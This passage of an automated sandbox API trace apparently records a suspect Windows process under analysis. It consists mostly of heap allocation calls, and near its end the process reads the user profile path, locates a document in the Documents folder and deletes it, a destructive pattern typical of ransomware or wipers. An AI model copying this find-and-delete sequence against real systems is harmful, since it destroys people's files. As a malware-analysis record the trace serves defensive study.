dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.254] CloseHandle (hObject=0x2c8) returned 1 [0264.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0264.259] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0264.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0264.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0264.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0264.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0264.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0264.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.261] CloseHandle (hObject=0x2d0) returned 1 [0264.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0264.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0264.274] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0264.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0264.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0264.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0264.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0264.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0264.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0264.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0264.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0264.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.284] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0264.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0264.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0264.284] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0264.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0264.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.285] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0264.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0264.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0264.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0264.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0264.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c8d0 [0264.287] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MlLRhGX00a.pptx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MlLRhGX00a.pptx", lpFilePart=0x8bedfc*="MlLRhGX00a.pptx") returned 0x37 [0264.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0264.287] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MlLRhGX00a.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mllrhgx00a.pptx")) returned 0x20 [0264.287] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MlLRhGX00a.pptx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1df860, ftCreationTime.dwHighDateTime=0x1d4d233, ftLastAccessTime.dwLowDateTime=0xc26e6c10, ftLastAccessTime.dwHighDateTime=0x1d48f4c, ftLastWriteTime.dwLowDateTime=0xc26e6c10, ftLastWriteTime.dwHighDateTime=0x1d48f4c, nFileSizeHigh=0x0, nFileSizeLow=0xb424, dwReserved0=0x1ce4, dwReserved1=0x4, cFileName="MlLRhGX00a.pptx", cAlternateFileName="MLLRHG~1.PPT")) returned 0xaa5820 [0264.288] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MlLRhGX00a.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mllrhgx00a.pptx")) returned 1 [0264.290] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1df860, ftCreationTime.dwHighDateTime=0x1d4d233, ftLastAccessTime.dwLowDateTime=0xc26e6c10, ftLastAccessTime.dwHighDateTime=0x1d48f4c, ftLastWriteTime.dwLowDateTime=0xc26e6c10, ftLastWriteTime.dwHighDateTime=0x1d48f4c, nFileSizeHigh=0x0, nFileSizeLow=0xb424, dwReserved0=0x1ce4, dwReserved1=0x4, cFileName="MlLRhGX00a.pptx", cAlternateFileName="MLLRHG~1.PPT")) returned 0 [0264.290] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0264.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.291] HeapFree 